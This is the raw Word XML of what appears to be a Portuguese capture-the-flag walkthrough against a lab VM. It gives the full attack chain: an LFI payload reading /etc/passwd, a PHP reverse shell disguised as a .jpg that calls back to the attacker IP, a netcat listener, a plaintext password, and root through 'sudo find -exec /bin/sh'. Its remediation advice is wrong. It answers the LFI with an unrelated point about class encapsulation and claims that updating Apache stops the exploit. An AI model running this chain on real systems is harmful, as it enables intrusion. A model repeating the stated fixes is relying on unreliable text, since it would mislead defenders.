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A909F" w14:textId="1C06F0AA" w:rsidR="001D6E33" w:rsidRDefault="00FE6A10">
      <w:r>
        <w:t>1#: ip -br -c a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B62ED" w14:textId="4EF2EB36" w:rsidR="00FE6A10" w:rsidRDefault="00FE6A10">
      <w:r>
        <w:t>2#: netdiscover -i eth0 -P -r 192.168.56.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58364E35" w14:textId="2218FEE8" w:rsidR="00FE6A10" w:rsidRDefault="00FE6A10">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FA8CBBF" wp14:editId="629AACCE">
            <wp:extent cx="5731510" cy="1534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C699" w14:textId="417753BC" w:rsidR="00FE6A10" w:rsidRDefault="00FE6A10">
      <w:r>
        <w:t>4#: Entrar em 192.168.56.102 no navegador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B889731" w14:textId="24B595D9" w:rsidR="00FE6A10" w:rsidRDefault="00FE6A10">
      <w:r w:rsidRPr="00FE6A10">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D7DB5E7" wp14:editId="2BDEEC39">
            <wp:extent cx="5731510" cy="34093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78C7" w14:textId="20BD2B1C" w:rsidR="00DE7F29" w:rsidRDefault="00DE7F29">
      <w:r>
        <w:t>5#: encontramos a url vuneravel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142BA638" w14:textId="1D06DDAF" w:rsidR="00DE7F29" w:rsidRDefault="00DE7F29">
      <w:r w:rsidRPr="00DE7F29">
        <w:t>http://192.168.56.102/language.php?lang=en.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A9C08B" w14:textId="1F4C6545" w:rsidR="00DE7F29" w:rsidRDefault="00DE7F29"/>
    <w:p w14:paraId="50D5DA90" w14:textId="2B734988" w:rsidR="00DE7F29" w:rsidRDefault="00DE7F29">
      <w:r w:rsidRPr="00DE7F29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E9B7EB7" wp14:editId="7FC0C11B">
            <wp:extent cx="5731510" cy="34417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09CF" w14:textId="77777777" w:rsidR="00CE721F" w:rsidRDefault="00DE7F29" w:rsidP="00CE721F">
      <w:r>
        <w:t>6#:</w:t>
      </w:r>
      <w:r w:rsidR="00CE721F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE721F" w:rsidRPr="00DE7F29">
        <w:t>http://192.168.56.102/language.php?lang=../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110949AB" w14:textId="1625E93F" w:rsidR="00DE7F29" w:rsidRDefault="00DE7F29">
      <w:r>
        <w:t xml:space="preserve"> Encontramos uma falha de LFI</w:t>
      </w:r>
      <w:r w:rsidR="00CE721F">
        <w:t xml:space="preserve"> nessa URL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEB83DF" w14:textId="201C7615" w:rsidR="00DE7F29" w:rsidRDefault="00DE7F29">
      <w:r>
        <w:t>SOLUÇÃO: Cada método precisa ser instanciado dentro de uma classe para garantir o encapsulamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA89293" w14:textId="08192452" w:rsidR="00DE7F29" w:rsidRDefault="00DE7F29">
      <w:r w:rsidRPr="00DE7F29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="010565D8" wp14:editId="1755A27D">
            <wp:extent cx="5731510" cy="27635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3677" w14:textId="0BA776F0" w:rsidR="00D612E1" w:rsidRDefault="00D612E1">
      <w:r>
        <w:t>7#: entramos na pagina de envio de arquivos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4793020E" w14:textId="7EF1F252" w:rsidR="00D612E1" w:rsidRDefault="00D612E1">
      <w:r w:rsidRPr="00D612E1">
        <w:t>http://192.168.56.102/upload.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DEA6E2" w14:textId="5F69484D" w:rsidR="00D612E1" w:rsidRDefault="00D612E1">
      <w:r w:rsidRPr="00D612E1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="622BF334" wp14:editId="175AD38C">
            <wp:extent cx="5731510" cy="27673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9793" w14:textId="243FFA04" w:rsidR="0050191B" w:rsidRDefault="0050191B">
      <w:r>
        <w:t xml:space="preserve">8#: na pasta </w:t>
      </w:r>
      <w:r w:rsidRPr="0050191B">
        <w:t>/usr/share/webshells/php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encontramos os seguintes exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B2837" w14:textId="456742BF" w:rsidR="0050191B" w:rsidRDefault="0050191B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="614E7285" wp14:editId="198C3AC6">
            <wp:extent cx="4800600" cy="781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ECAF" w14:textId="732EEB9E" w:rsidR="00CE721F" w:rsidRPr="00CE721F" w:rsidRDefault="0050191B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE721F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">9#: </w:t>
      </w:r>
      <w:r w:rsidR="00CE721F" w:rsidRPr="00CE721F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cp php-reverse-shell.php revshell.php.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25786451" w14:textId="684394DE" w:rsidR="0050191B" w:rsidRDefault="0050191B">
      <w:r>
        <w:t>faremos uma copia do arquivo php-reverse-shell.php e a nomeamos ela como “shell.php.jpg”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6CA111" w14:textId="2A95A5CC" w:rsidR="0050191B" w:rsidRDefault="0050191B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EFBE3A5" wp14:editId="0F09B644">
            <wp:extent cx="5731510" cy="11283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4C50" w14:textId="785165DE" w:rsidR="00742ED7" w:rsidRDefault="00742ED7">
      <w:r>
        <w:t>10#: nano revshell.php.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BDEFEE" w14:textId="1CB537FA" w:rsidR="00742ED7" w:rsidRDefault="00742ED7">
      <w:r>
        <w:t>Mudaremos o ip ‘127.0.0.1’ para o nosso ip ‘192.168.56.101’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68752514" w14:textId="32838E27" w:rsidR="00742ED7" w:rsidRDefault="00742ED7">
      <w:r w:rsidRPr="00742ED7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EAAD094" wp14:editId="502B91C2">
            <wp:extent cx="5731510" cy="19069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DFEA" w14:textId="6FFED135" w:rsidR="00742ED7" w:rsidRDefault="00AA4C7A">
      <w:r w:rsidRPr="00AA4C7A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DACE44E" wp14:editId="7164EE33">
            <wp:extent cx="5731510" cy="19069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C3EA" w14:textId="21CF58FD" w:rsidR="00217EB6" w:rsidRDefault="00217EB6">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00742ED7">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>#: enviaremos o arquivo para o servidor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1504D8" w14:textId="6582897C" w:rsidR="00217EB6" w:rsidRDefault="00217EB6">
      <w:r w:rsidRPr="00217EB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ED092BF" wp14:editId="48043C1A">
            <wp:extent cx="5731510" cy="34848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444B" w14:textId="2001574C" w:rsidR="00217EB6" w:rsidRDefault="00217EB6">
      <w:r w:rsidRPr="00217EB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="503A320E" wp14:editId="2FC0D66D">
            <wp:extent cx="5731510" cy="34753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C304" w14:textId="13D18190" w:rsidR="00CD311F" w:rsidRDefault="00CD311F">
      <w:r w:rsidRPr="00CD311F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F92F64D" wp14:editId="7FDB1C16">
            <wp:extent cx="5731510" cy="26568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37AB" w14:textId="77A91219" w:rsidR="00CD311F" w:rsidRDefault="00CD311F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD311F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00742ED7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD311F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#: gobuster dir -u 192.168.56.102 -w /usr/share/wordlists/dirb/big.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F3354" w14:textId="00B88BCF" w:rsidR="00CD311F" w:rsidRDefault="00CD311F">
      <w:r w:rsidRPr="00CD311F">
        <w:t>Usando o gobuster encontramos a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="002D7DC8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.102/uploads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="498D7E29" w14:textId="3919F118" w:rsidR="00CD311F" w:rsidRPr="00CD311F" w:rsidRDefault="00CD311F">
      <w:r>
        <w:t>É nela onde o exploit estará situado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281DBD3D" w14:textId="7C56F555" w:rsidR="00CD311F" w:rsidRDefault="00CD311F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7982B037" wp14:editId="6A4028DE">
            <wp:extent cx="5731510" cy="31927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15FB" w14:textId="69386C46" w:rsidR="00F97B1B" w:rsidRDefault="00F97B1B">
      <w:r w:rsidRPr="00F97B1B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0348E912" wp14:editId="25E54FF0">
            <wp:extent cx="5731510" cy="25057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3F68" w14:textId="77777777" w:rsidR="006825DB" w:rsidRDefault="00F97B1B">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00742ED7">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>#: nc -nlvp</w:t>
      </w:r>
      <w:r w:rsidR="00211AC6">
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
      <w:r w:rsidR="006825DB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349E9B36" w14:textId="3E45BDA5" w:rsidR="00F97B1B" w:rsidRDefault="006825DB">
      <w:r>
        <w:t>(A porta 1234 se refere a porta default do exploit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF8E897" w14:textId="26F73FE3" w:rsidR="00F97B1B" w:rsidRDefault="00F97B1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5947ECA3" wp14:editId="374E132A">
            <wp:extent cx="3286125" cy="6477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BD2E" w14:textId="396B0969" w:rsidR="009D40D0" w:rsidRDefault="009D40D0">
      <w:r>
        <w:t xml:space="preserve">14#: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="002D7DC8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.102/language.php?lang=uploads/revshell.php.jpg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53B98580" w14:textId="419F6897" w:rsidR="009D40D0" w:rsidRDefault="009D40D0">
      <w:r>
        <w:t>Executamos o nosso exploit e conectamos pelo netcat a porta 1234, acessando o terminal do servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C95642F" w14:textId="1B7C39EE" w:rsidR="009D40D0" w:rsidRDefault="009D40D0">
      <w:r w:rsidRPr="009D40D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67FB4518" wp14:editId="0B78EEBA">
            <wp:extent cx="5731510" cy="26485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2779" w14:textId="44E93D9C" w:rsidR="009D40D0" w:rsidRDefault="009D40D0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CD301FF" wp14:editId="35CF1AA7">
            <wp:extent cx="5731510" cy="15862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53A0" w14:textId="2CA39075" w:rsidR="00D61057" w:rsidRDefault="00D61057">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D61057">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">15#: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F662E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 -c "import pty; pty.spawn('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E994AD" w14:textId="55512C6D" w:rsidR="00D61057" w:rsidRDefault="008D4512">
      <w:r w:rsidRPr="008D4512">
        <w:t xml:space="preserve">Nos permite acessar um </w:t>
      </w:r>
      <w:r>
        <w:t>usuário www-data@bassam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012DC904" w14:textId="26224164" w:rsidR="008D4512" w:rsidRDefault="008D4512">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55AC9B0B" wp14:editId="59C4DA26">
            <wp:extent cx="3781425" cy="3238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7378" w14:textId="049322AB" w:rsidR="008D4512" w:rsidRDefault="008D4512">
      <w:r>
        <w:t>16#:</w:t>
      </w:r>
      <w:r w:rsidR="0064619F">
        <w:t xml:space="preserve"> na pasta </w:t>
      </w:r>
      <w:r w:rsidR="0064619F" w:rsidRPr="0064619F">
        <w:t>/var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5B23F" w14:textId="56F79111" w:rsidR="0064619F" w:rsidRDefault="0064619F">
      <w:r>
        <w:t>Encontramos “supersecret-for-aziz”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FA2F18" w14:textId="5BC27169" w:rsidR="0064619F" w:rsidRDefault="0064619F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29799885" wp14:editId="38DCED0D">
            <wp:extent cx="5153025" cy="6191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A648" w14:textId="0BBCB6C5" w:rsidR="0064619F" w:rsidRDefault="0064619F">
      <w:r>
        <w:t>17#: Nessa pasta encontramos “bassam-pass.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F039A9" w14:textId="5335E0DB" w:rsidR="0064619F" w:rsidRDefault="0064619F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="035C31F6" wp14:editId="02F5571A">
            <wp:extent cx="4562475" cy="4286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1DAE" w14:textId="13996EBA" w:rsidR="00AF7A80" w:rsidRDefault="00AF7A80">
      <w:r>
        <w:t>18#: cat bassam-pass.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003997BC" w14:textId="4FF658A3" w:rsidR="00AF7A80" w:rsidRDefault="00AF7A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5384D233" wp14:editId="4CDD447A">
            <wp:extent cx="5731510" cy="4635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905A" w14:textId="77777777" w:rsidR="001576AD" w:rsidRDefault="001576AD"/>
    <w:p w14:paraId="38B348DF" w14:textId="11A2B705" w:rsidR="00D64289" w:rsidRDefault="00D64289">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>19#: su</w:t>
      </w:r>
      <w:r w:rsidR="001576AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bassam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A49A970" w14:textId="0F90F924" w:rsidR="00D64289" w:rsidRDefault="00D64289">
      <w:r>
        <w:t>Senha: Password123!@#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B2914D" w14:textId="7FD4AEFA" w:rsidR="00D64289" w:rsidRDefault="00D64289">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57487CC5" wp14:editId="12E77287">
            <wp:extent cx="5200650" cy="800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BAD0" w14:textId="05929627" w:rsidR="004C6F8F" w:rsidRDefault="004C6F8F">
      <w:r>
        <w:t>20#:</w:t>
      </w:r>
      <w:r w:rsidR="00AA0B8A">
        <w:t xml:space="preserve"> Encontramos a FLAG 1 (USUARIO BASSAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E678A54" w14:textId="7FADDA70" w:rsidR="00AA0B8A" w:rsidRDefault="00AA0B8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="547E3BAE" wp14:editId="09C45E27">
            <wp:extent cx="5648325" cy="13525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0049" w14:textId="24191220" w:rsidR="00371D9B" w:rsidRDefault="00371D9B">
      <w:r>
        <w:t>21#: sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D91CF4" w14:textId="133230B6" w:rsidR="00A5103D" w:rsidRDefault="00A5103D">
      <w:r>
        <w:t>Senha: Password123!@#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C11346E" w14:textId="40D70DC0" w:rsidR="00371D9B" w:rsidRDefault="00371D9B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="074F3E12" wp14:editId="3800EE05">
            <wp:extent cx="5731510" cy="13423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5957" w14:textId="4EEF0626" w:rsidR="00E63C9B" w:rsidRPr="00CF3746" w:rsidRDefault="00E63C9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3746">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>22#:</w:t>
      </w:r>
      <w:r w:rsidR="00CF3746" w:rsidRPr="00CF3746">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3746">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> find . -exec /bin/sh \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618B10F4" w14:textId="6C65AE74" w:rsidR="00CF3746" w:rsidRDefault="00CF3746">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="252DB3BD" wp14:editId="65552FB2">
            <wp:extent cx="4333875" cy="4572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779A" w14:textId="49B01D47" w:rsidR="00A02165" w:rsidRPr="00A2624C" w:rsidRDefault="00A02165">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2624C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">23#: </w:t>
      </w:r>
      <w:r w:rsidR="00A2624C" w:rsidRPr="009F662E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 -c "import pty; pty.spawn('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00679E3D" w14:textId="5239D1B7" w:rsidR="00A02165" w:rsidRDefault="00A02165">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35C8C81E" wp14:editId="72B20335">
            <wp:extent cx="3790950" cy="5238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374B" w14:textId="69BFF5CF" w:rsidR="008C170C" w:rsidRDefault="008C170C">
      <w:r>
        <w:t>24#: cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0445EA62" w14:textId="31F025F6" w:rsidR="008C170C" w:rsidRDefault="001E3ECA">
      <w:r>
        <w:t xml:space="preserve">25#: </w:t>
      </w:r>
      <w:r w:rsidR="008C170C">
        <w:t>cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E077370" w14:textId="20C4B559" w:rsidR="008C170C" w:rsidRDefault="008C170C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="183ECB07" wp14:editId="3BFF9679">
            <wp:extent cx="3238500" cy="1371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E9D4" w14:textId="171DBF3A" w:rsidR="00461D71" w:rsidRDefault="00461D71">
      <w:r>
        <w:t>26#: nmap -p- -SV 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3DC705" w14:textId="6B518286" w:rsidR="00461D71" w:rsidRDefault="00461D71">
      <w:r>
        <w:t>Utilizando o nmap descobrimos que a porta 80 esta aberta, a porta do apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CCD1AF" w14:textId="5F414804" w:rsidR="00461D71" w:rsidRDefault="00461D71">
      <w:r>
        <w:t>O exploit que usamos não funciona em uma versão atualizada do apache, logo a solução da vunerabilidade do apache é atualiza-lo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6674AE52" w14:textId="68414022" w:rsidR="00461D71" w:rsidRDefault="00461D71">
      <w:r>
        <w:t>A pasta “supersecret-for-azziz” é encontrada na var/www/html; ou seja com a informação que encontramos no nmap podemos presumir que algo estará presente nesse caminho.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6157A1" w14:textId="791C7656" w:rsidR="00461D71" w:rsidRDefault="00461D71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53F4C018" wp14:editId="48384654">
            <wp:extent cx="5731510" cy="16287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0209" w14:textId="77777777" w:rsidR="00A5103D" w:rsidRPr="008D4512" w:rsidRDefault="00A5103D"/>
    <w:p w14:paraId="5E1136F0" w14:textId="77777777" w:rsidR="009D40D0" w:rsidRPr="008D4512" w:rsidRDefault="009D40D0"/>
    <w:sectPr w:rsidR="009D40D0" w:rsidRPr="008D45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7A"/>
    <w:rsid w:val="001576AD"/>
    <w:rsid w:val="001D6E33"/>
    <w:rsid w:val="001E3ECA"/>
    <w:rsid w:val="00211AC6"/>
    <w:rsid w:val="00217EB6"/>
    <w:rsid w:val="00371D9B"/>
    <w:rsid w:val="003A3D7A"/>
    <w:rsid w:val="00461D71"/>
    <w:rsid w:val="004C6F8F"/>
    <w:rsid w:val="0050191B"/>
    <w:rsid w:val="005A2205"/>
    <w:rsid w:val="0064619F"/>
    <w:rsid w:val="006825DB"/>
    <w:rsid w:val="00742ED7"/>
    <w:rsid w:val="008668E5"/>
    <w:rsid w:val="008C170C"/>
    <w:rsid w:val="008D4512"/>
    <w:rsid w:val="009D40D0"/>
    <w:rsid w:val="00A02165"/>
    <w:rsid w:val="00A2624C"/>
    <w:rsid w:val="00A5103D"/>
    <w:rsid w:val="00AA0B8A"/>
    <w:rsid w:val="00AA4C7A"/>
    <w:rsid w:val="00AF7A80"/>
    <w:rsid w:val="00B67413"/>
    <w:rsid w:val="00CD311F"/>
    <w:rsid w:val="00CE721F"/>
    <w:rsid w:val="00CF3746"/>
    <w:rsid w:val="00D61057"/>
    <w:rsid w:val="00D612E1"/>
    <w:rsid w:val="00D64289"/>
    <w:rsid w:val="00DB7711"/>
    <w:rsid w:val="00DE7F29"/>
    <w:rsid w:val="00E63C9B"/>
    <w:rsid w:val="00F97B1B"/>
    <w:rsid w:val="00FE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8B29"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D3E16F91-B1B3-4525-8A72-419F407C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31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hyperlink" Target="http://192.168.56.102/uploads/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.56.102/language.php?lang=uploads/revshell.php.jpg" TargetMode="External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358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29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-05T13:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-05T14:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>